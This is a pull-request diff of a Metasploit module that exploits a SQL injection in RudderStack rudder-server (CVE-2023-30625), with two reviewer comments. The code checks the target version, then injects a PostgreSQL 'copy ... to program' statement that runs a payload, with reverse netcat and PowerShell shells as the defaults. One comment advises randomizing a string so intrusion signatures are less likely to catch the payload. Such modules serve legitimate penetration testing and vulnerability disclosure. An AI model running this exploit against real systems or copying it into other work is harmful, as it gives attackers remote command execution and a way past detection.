modules/exploits/multi/http/rudder_server_sqli_rce.rb

```diff
@@ -0,0 +1,112 @@
+        'Description' => %q{
+          This Metasploit module exploits a SQL injection vulnerability in
+          RudderStack's rudder-server, an open source Customer Data Platform (CDP).
+          The vulnerability exists in versions of rudder-server prior to 1.3.0-rc.1.
+          By exploiting this flaw, an attacker can execute arbitrary SQL commands,
+          which may lead to Remote Code Execution (RCE) due to the `rudder` role
+          in PostgresSQL having superuser permissions by default.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ege Balcı <egebalci@pm.me>' # msf module
+        ],
+        'References' => [
+          ['CVE', '2023-30625'],
+          ['URL', 'https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-30625'],
+        ],
+        'DefaultOptions' => {
+          'SSL' => false,
+          'WfsDelay' => 5
+        },
+        'Platform' => [ 'unix', 'linux' ],
+        'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
+        'Targets' => [
+          ['Automatic', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } }],
+          ['Linux', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } }],
+          ['Windows', { 'DefaultOptions' => { 'PAYLOAD' => 'windows/powershell_reverse_tcp' } }],
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2023-06-16',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [true, 'The URI of the Rudder API', '/']),
+        OptString.new('API_USER', [false, 'The Rudder API basic authentication username', 'key']),
+        OptString.new('API_PASS', [false, 'The Rudder API basic authentication password', '']),
+      ]
+    )
+  end
+
+  def check
+    version = get_version
+    if version.match(/^[01]\.[012]/) # v0.*.* - v1.2*
+      Exploit::CheckCode::Appears("Rudder Version: #{version}")
+    else
+      if version == 'Unknown'
+        return Exploit::CheckCode::Unknown
+      end
+
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def get_version
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'version')
+    )
+    if res && res.code == 200
+      ver = res.get_json_document['Version']
+      if ver.empty?
+        return 'Unknown'
+      end
+
+      ver
+    end
+  end
+
+  def exploit
+    print_status "Detected rudder version: #{get_version}"
+    # If not 'Auto' then use the selected version
+    shell = 'bash'
+    if target == targets[2]
+      shell = 'cmd.exe'
+    end
+
+    data = "{\"source_id\": \"yeet!'; copy (SELECT '#{payload.encoded}') to program '#{shell}'-- - \"}"
```

Comment:
```suggestion
    data = "{\"source_id\": \"#{Rex::Text.rand_text_alpha(4..8)}'; copy (SELECT '#{payload.encoded}') to program '#{shell}'-- - \"}"
```
I enjoy yeeting things as well - however to avoid this payload from being easily signatured, it would be best to randomize this value.

Reply:
Also, we might need to make sure no breaking characters are included in the payload. This would break the JSON format.